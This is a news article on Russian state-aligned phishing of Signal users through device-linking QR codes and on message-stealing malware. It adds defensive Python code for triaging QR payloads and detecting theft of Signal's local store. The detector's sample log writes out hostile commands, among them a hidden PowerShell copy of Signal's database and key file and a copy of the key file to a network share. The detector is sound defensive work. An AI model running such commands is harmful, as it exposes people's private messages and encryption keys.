- Google researchers warn of an ongoing phishing campaign
- It distributes QR codes that give attackers access to people's Signal accounts
- The targets are mostly military personnel, the experts warn
Russian state-sponsored threat actors have increasingly targeted Signal messenger users with QR-code phishing, malware and more, experts have warned.
A report from the Google Threat Intelligence Group (GTIG) notes that the use of Signal among military personnel, politicians, journalists, activists and other high-risk groups has recently become widespread, which has drawn growing interest from Russian state-aligned threat actors, particularly since the start of the Russia-Ukraine war.
As a result, several threat actors (notably APT44 and UNC5792) have been abusing Signal's "linked devices" feature in their attacks. Linked devices let a user connect multiple devices, such as laptops, tablets and phones, to the same account. To keep sign-in simple, the user scans a QR code with a device that is already signed in, instead of typing a password or registering the new device separately.
QR codes
With that in mind, the attackers have begun sending phishing emails that carry fake group invitations, purported security alerts and similar lures, together with a QR code. If the victim scans it, the attacker's device is linked to the victim's account, giving the attacker access to contacts, messages and more for as long as the rogue device stays linked, that is, until the victim notices and removes it under Signal's Linked Devices settings.
Because the phishing email carries no malicious link or attachment for email security solutions to scan, these messages often slip past filters and into people's inboxes.
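The abuse described above works because a device-linking QR code looks, to the person scanning it, just like a harmless group invite. The following is an added example, not code from the original article or from Signal: it decodes the payload of a scanned QR code and flags anything that would link a new device to the account rather than merely join a group. It assumes that Signal's device-linking QR encodes a URI of the form `sgnl://linkdevice?uuid=...&pub_key=...` and that group invites are `https://signal.group/#...` links; both are assumptions about the current formats, and the sample payloads are constructed.

```python
# Added example, not code from the original article or from Signal.
# Triage a decoded QR payload before acting on it: a Signal group invite is
# an https://signal.group/#... link, while a device-linking QR is assumed here
# to carry an sgnl://linkdevice?uuid=...&pub_key=... URI (an assumption about
# the current format, not documented in the article). Anything that would
# link a new device to the account is flagged.
from urllib.parse import urlsplit, parse_qs

LINK_DEVICE = "link-device"    # scanning this registers a new device on your account
GROUP_INVITE = "group-invite"  # scanning this only joins a group
OTHER = "other"


def classify_qr_payload(payload: str) -> dict:
    """Return {'kind': ..., 'detail': ...} for one decoded QR payload."""
    text = payload.strip()
    parts = urlsplit(text)
    scheme = parts.scheme.lower()
    host = parts.netloc.lower()

    if scheme == "sgnl" and host == "linkdevice":
        params = parse_qs(parts.query)
        # A complete linking URI carries the provisioning id and an ephemeral public key.
        complete = "uuid" in params and "pub_key" in params
        return {"kind": LINK_DEVICE,
                "detail": "complete linking URI" if complete else "malformed linking URI"}

    if scheme == "https" and host == "signal.group" and parts.fragment:
        return {"kind": GROUP_INVITE, "detail": "group invite link"}

    return {"kind": OTHER, "detail": f"{scheme or 'no'} scheme, host {host or '(none)'}"}


def triage(payloads):
    """Classify several payloads and return only the ones that would link a device."""
    return [p for p in payloads if classify_qr_payload(p)["kind"] == LINK_DEVICE]


# Constructed sample payloads, as QR codes embedded in a lure email might decode to.
SAMPLES = [
    "https://signal.group/#CjQKIGltYWdpbmVkLWdyb3VwLWludml0ZS1mb3ItdGVzdGluZw",
    "sgnl://linkdevice?uuid=5f3a8f1e-0000-4000-8000-000000000000&pub_key=BQAAAA",
    "https://example.invalid/security-alert",
]

if __name__ == "__main__":
    for p in SAMPLES:
        r = classify_qr_payload(p)
        print(f"{r['kind']:13} {r['detail']:22} {p[:60]}")
    print("would link a device:", triage(SAMPLES))
```

The point of the check is the first branch: a lure that claims to be a group invite or a security alert but decodes to a device-linking URI is exactly the pattern the campaign relies on, and the user's own device is the only place the distinction can be made before the link is accepted.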
Beyond phishing, Russian and Belarusian threat groups are also using specialized malware and tools to exfiltrate Signal messages directly from compromised Android and Windows devices.
These efforts include scripts such as WAVESIGN, which periodically extracts messages from the Signal database, and Infamous Chisel, a variant of known Android malware. Other actors, such as Turla and UNC1151, have used PowerShell and command-line tools to steal stored Signal messages from compromised computers.
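The PowerShell and command-line theft described above leaves a simple trace: a process other than Signal Desktop reading Signal's local store. The following is an added detection example, not code from the original article or from any of the tools it names. It runs over constructed process-creation records (CSV lines of timestamp, user, image and command line) and flags non-Signal processes whose command line references Signal Desktop's message database or its `config.json`. The paths it looks for, `%APPDATA%\Signal\sql\db.sqlite` and `%APPDATA%\Signal\config.json` (the latter holding the database key), are assumptions about Signal Desktop's layout on Windows, not facts taken from the article.

```python
# Added example, not code from the original article or from any of the tools it
# names. Given process-creation records (constructed here as CSV lines:
# timestamp,user,image,command_line), flag non-Signal processes whose command
# line touches Signal Desktop's local store. The paths assumed are
# %APPDATA%\Signal\sql\db.sqlite (the message database) and
# %APPDATA%\Signal\config.json (which holds the database key); they are
# assumptions about Signal Desktop's layout, not facts taken from the article.
import csv
import io
import re

# Either store file, with forward or back slashes, case-insensitive.
SIGNAL_STORE = re.compile(
    r"signal[\\/](?:sql[\\/]db\.sqlite|config\.json)", re.IGNORECASE)
# Signal Desktop itself legitimately opens its own store; skip it.
SIGNAL_IMAGE = re.compile(r"[\\/]signal\.exe$", re.IGNORECASE)


def detect_signal_store_access(log_text: str) -> list:
    """Return one alert dict per record in which a process other than Signal
    references Signal Desktop's database or its config.json."""
    alerts = []
    for row in csv.DictReader(io.StringIO(log_text)):
        image = row["image"]
        cmd = row["command_line"]
        if SIGNAL_IMAGE.search(image):
            continue
        # Normalise matched paths so the same file reported with / or \ compares equal.
        hits = sorted({m.group(0).lower().replace("/", "\\")
                       for m in SIGNAL_STORE.finditer(cmd)})
        if hits:
            alerts.append({"time": row["timestamp"], "user": row["user"],
                           "image": image, "touched": hits})
    return alerts


# Constructed sample records: one benign Signal start, two collection attempts
# (PowerShell copying the database and key file; cmd.exe copying the key file to
# a share), and one unrelated process.
SAMPLE_LOG = r"""timestamp,user,image,command_line
2025-02-19T10:01:02Z,alice,C:\Users\alice\AppData\Local\Programs\signal-desktop\Signal.exe,"C:\Users\alice\AppData\Local\Programs\signal-desktop\Signal.exe"
2025-02-19T10:03:40Z,alice,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,"powershell -nop -w hidden Copy-Item $env:APPDATA\Signal\sql\db.sqlite $env:TEMP\s.db; Copy-Item $env:APPDATA\Signal\config.json $env:TEMP\c.json"
2025-02-19T10:04:11Z,alice,C:\Windows\System32\cmd.exe,"cmd /c copy %APPDATA%\Signal\config.json \\10.0.0.5\share\"
2025-02-19T10:05:00Z,alice,C:\Windows\explorer.exe,"C:\Windows\explorer.exe"
"""

if __name__ == "__main__":
    for a in detect_signal_store_access(SAMPLE_LOG):
        print(f"{a['time']} {a['user']} {a['image']} -> {', '.join(a['touched'])}")
```

Matching on the command line alone is deliberately narrow; in a real deployment the same pattern belongs on file-access telemetry as well, since a script can reach the store without naming it on the command line. Excluding only `Signal.exe` by image name is also a convenience of the example: an attacker who names a tool `signal.exe` would slip past it, so a production rule should key on a verified signer or full path instead.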